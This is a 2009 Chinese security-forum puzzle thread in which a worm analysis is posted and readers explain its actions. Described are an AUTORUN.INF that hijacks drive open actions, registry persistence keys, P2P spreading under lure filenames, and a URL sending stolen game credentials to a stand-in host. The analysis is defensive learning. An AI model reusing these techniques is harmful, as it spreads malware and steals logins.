【论坛三周年样本区】样本区活动2之“话中有话”

qianwenxiang

规则：
1. 以下是一篇分析大杂烩，其中把病毒一些动作的用意给隐藏起来了，这个活动需要你开动脑细胞，猜测各个不同动作到底是为了干什么或者说作者的用意到底是什么~
2. 每人限指出一处
3. 不得和已有回复以及本帖中的两个重复，否则不算有效回复
4. 任何特殊组均可参加

已经被逮出来“话中有话”的句子：
-----------------------------------------------------------------------------
最后，主程序会每隔6秒检测一次是否存在窗体“CD Writing Wizard”，如果存在，程序会立即复制自身到%USERPROFILE%\Local Settings\Application Data\Microsoft\CD Burning\的[随机名].exe，并建立Autorun.inf，内容与上面的类似。【2L】
-----------------------------------------------------------------------------
随后，程序获取所有磁盘盘符列表，并获取磁盘类型，判断是否为本地磁盘分区或者移动磁盘，如果是，则复制自身到磁盘目录下，设置属性为“只读、系统、隐藏”，同时创建一个AUTORUN.INF，内容如下：【3L】
-----------------------------------------------------------------------------
同时，主程序会读取一个P2P共享程序Kazza的配置注册表项：HKCU\Software\Kazaa\Transfer\DlDir0的值以及%USERPROFILE%\Shared，并使用自带的ZIP算法将自身打包，复制到上述目录，名称为"Sexy.Porn.Videos.Click.To.Download.zip", "Windows.7.Crack.Tool.exe","Windows.Live.Messenger.Beta.Serial.Generator-PARADOX.zip", "msngen.exe"等中的一个【5L】
-----------------------------------------------------------------------------
DLL启动后会试图注入所有进程，并且获取注入进程的文件名，如果是某游戏的文件名Start.EXE，则程序会试图获取一部分登陆信息，在获取完信息后，程序会休眠60000毫秒，然后访问http://www.thisisaexample.com/updata.asp?AcInfo=username&ApInfo=pwname&AsInfo=server&AnInfo=name&AlInfo=level，访问后，ASP回复的信息是空。【7L】




范例：
“Windows.All.System.Cracker.EXE”等不同文件名 －作者这么做是为了欺骗用户打开/下载他的文件
“访问后，ASP回复的信息是空”－就是ASP没有设置返回信息，或者返回了一个空字符，但是ASP的确访问成功了，因为并没有出现404错误什么的（当然这句是写规则需要，全文仅此一处，其余的不存在隐藏的这么深的废话了）

奖励：
1， 正确回复＋15经验。


除去上面两个，全文共有17+处“话中有话”，ACTION，FIND THEM OUT!

报告在此：

大小：3.03 MB (3,187,421 字节)
MD5： C38588DF957E930582178DC08E0A171C
程序默认位置: c:\1.exe

系统修改：
(%PROG%=默认C:\program files; %WINDIR%=默认c:\windows\; %SYSTEM%=默认c:\windows\system32; %USERPROFILE%=默认c:\documents and settings\username\)

启动后，程序会读取参数，如果参数为-d [文件名]，则程序会休眠1000毫秒并删除[文件名]，之后程序寻找系统是否存在%PROG%\eMule\Incoming\目录，如果不存在，则程序释放自身资源到%WINDIR%\temp\eu.rar并调用系统RAR解压到%PROG%\eMu1e\目录下，然后复制自己为“Windows.All.System.Cracker.EXE”等不同文件名到%PROG%\eMule\Incoming\目录下，之后，启动%PROG%\eMu1e\eMule.exe，方式为隐藏窗体启动。

随后，程序获取所有磁盘盘符列表，并获取磁盘类型，判断是否为本地磁盘分区或者移动磁盘，如果是，则复制自身到磁盘目录下，设置属性为“只读、系统、隐藏”，同时创建一个AUTORUN.INF，内容如下：
[AutoRun]
open=serv.exe
shell\open=打开(&O)
shell\open\Command=serv.exe
shell\open\Default=1
shell\explore=资源管理器(&X)
shell\explore\Command=serv.exe

接着，程序释放一个DLL到%SYSTEM%\[随机名].dll，并加入注册表项HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks\CLSID\{11111111-2222-3333-4444-555555555555}\InProcServer32,指向自身。

DLL启动后会试图注入所有进程，并且获取注入进程的文件名，如果是某游戏的文件名Start.EXE，则程序会试图获取一部分登陆信息，在获取完信息后，程序会休眠60000毫秒，然后访问http://www.thisisaexample.com/updata.asp?AcInfo=username&ApInfo=pwname&AsInfo=server&AnInfo=name&AlInfo=level，访问后，ASP回复的信息是空。

同时，主程序会读取一个P2P共享程序Kazza的配置注册表项：HKCU\Software\Kazaa\Transfer\DlDir0的值以及%USERPROFILE%\Shared，并使用自带的ZIP算法将自身打包，复制到上述目录，名称为"Sexy.Porn.Videos.Click.To.Download.zip", "Windows.7.Crack.Tool.exe","Windows.Live.Messenger.Beta.Serial.Generator-PARADOX.zip", "msngen.exe"等中的一个。

此时，主程序会建立文件件%System%\[随机名]\，并以[随机名2].exe的名称复制进去，创建注册表项“HKLM\SOFTWARE\WinService”，建立子项ServicePath，指向[随机名2].exe的路径，方便下次启动时读取自身路径用。然后，程序创建一个1x1的窗体，在系统屏幕（0，0）的地方出现，并添加启动项“HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Javasched”指向[随机名2].exe。

然后程序比对当前文件名是否与HKLM\SOFTWARE\WinService\ServicePath路径一样，如果不一样则检测[随机名2].exe是否存在，如果不存在则读取自身数据，并在EXE末端追加数据“damaged file[随机数字]”，复制自己到[随机名2]的位置，此时[随机名2]MD5变为“0854FEBB969D2EF71F0615611F13BF40”，并启动[随机名2].exe，参数为-d c:\1.exe，1.exe退出。[随机名2]执行相同操作。

最后，主程序会每隔6秒检测一次是否存在窗体“CD Writing Wizard”，如果存在，程序会立即复制自身到%USERPROFILE%\Local Settings\Application Data\Microsoft\CD Burning\的[随机名].exe，并建立Autorun.inf，内容与上面的类似。

[ 本帖最后由 aarwwefdds 于 2009-5-30 16:11 编辑 ]

taoyuan237

最后，主程序会每隔6秒检测一次是否存在窗体“CD Writing Wizard”，如果存在，程序会立即复制自身到%USERPROFILE%\Local Settings\Application Data\Microsoft\CD Burning\的[随机名].exe，并建立Autorun.inf，内容与上面的类似

这是为了在有刻录机的电脑上加入病毒的刻录，
在此文件夹下写入以后使用WINDOWS自带的刻录程序刻录时会自动把病毒也刻录进光盘

花间酒

随后，程序获取所有磁盘盘符列表，并获取磁盘类型，判断是否为本地磁盘分区或者移动磁盘，如果是，则复制自身到磁盘目录下，设置属性为“只读、系统、隐藏”，同时创建一个AUTORUN.INF，内容如下：
[AutoRun]
open=serv.exe
shell\open=打开(&O)
shell\open\Command=serv.exe
shell\open\Default=1
shell\explore=资源管理器(&X)
shell\explore\Command=serv.exe

[AutoRun]
open=serv.exe
shell\open=打开(&O)
shell\open\Command=serv.exe
shell\open\Default=1
shell\explore=资源管理器(&X)
shell\explore\Command=serv.exe[/quote]
这是为了当用户打开盘符,插入U盘时，就能透过AUTORUN的机制运行病毒,从而让清除病毒更加困难，病毒也能透过U盘传染

shell\open=打开(&O)
shell\open\Command=serv.exe 右键打开操作换成打开病毒
shell\explore=资源管理器(&X)
shell\explore\Command=serv.exe[/quote] 右键资源管理器操作换成打开病毒

[ 本帖最后由 lunglungyu 于 2009-5-30 15:07 编辑 ]

elst5523183

接着，程序释放一个DLL到%SYSTEM%\[随机名].dll，并加入注册表项HKLM\SOFTWARE\Microsoft\Windows \CurrentVersion\Explorer\ShellExecuteHooks\CLSID \{11111111-2222-3333-4444-555555555555}\InProcServer32,指向自身。

指这个[随机名].dll通过修改注册表来添加启动项

yjwfdc

同时，主程序会读取一个P2P共享程序Kazza的配置注册表项：HKCU\Software\Kazaa\Transfer\DlDir0的值以及%USERPROFILE%\Shared，并使用自带的ZIP算法将自身打包，复制到上述目录，名称为"Sexy.Porn.Videos.Click.To.Download.zip", "Windows.7.Crack.Tool.exe","Windows.Live.Messenger.Beta.Serial.Generator-PARADOX.zip", "msngen.exe"等中的一个。

通过p2p软件共享给其它用户网络传播。

lcming

飘兄来了，高手也来了，这里只有我看的分了，都不懂呢。
不从病毒学出发，从数学出发，"程序创建一个1x1的窗体，在系统屏幕（0，0）的地方出现"   意思是在屏幕的角落里创建一个极小的窗口，从而起到隐蔽的作用。
如果这样都答对了，可以买六合彩了。

foreverhyx

原帖由 qianwenxiang 于 2009-5-30 12:05 发表
DLL启动后会试图注入所有进程，并且获取注入进程的文件名，如果是某游戏的文件名Start.EXE，则程序会试图获取一部分登陆信息，在获取完信息后，程序会休眠60000毫秒，然后访问http://www.thisisaexample.com/updata.asp?AcInfo=username&ApInfo=pwname&AsInfo=server&AnInfo=name&AlInfo=level，访问后，ASP回复的信息是空。

目的是读取登录信息，包括用户名，密码，延时后提交到该地址，然后清空ASP变量的信息  

PS：随便说说，见笑

xiaoqiang305

启动后，程序会读取参数，如果参数为-d [文件名]，则程序会休眠1000毫秒并删除[文件名]，之后程序寻找系统是否存在%PROG%\eMule\Incoming\目录，如果不存在，则程序释放自身资源到%WINDIR%\temp\eu.rar并调用系统RAR解压到%PROG%\eMu1e\目录下，然后复制自己为 “Windows.All.System.Cracker.EXE”等不同文件名到%PROG%\eMule\Incoming\目录下，之后，启动%PROG%\eMu1e\eMule.exe，方式为隐藏窗体启动


为了通过emule 下载木马  隐藏窗体不想让用户发现
好像 ~~

zwl2828

接着，程序释放一个DLL到%SYSTEM%\[随机名].dll，并加入注册表项HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks\CLSID\{11111111-2222-3333-4444-555555555555}\InProcServer32,指向自身。

额，现在才看到。

这么做，无论是在资源管理器里双击图标，还是运行程序或打开文件，都会激活这里的项目，这样恶意软件就会无处不在哦。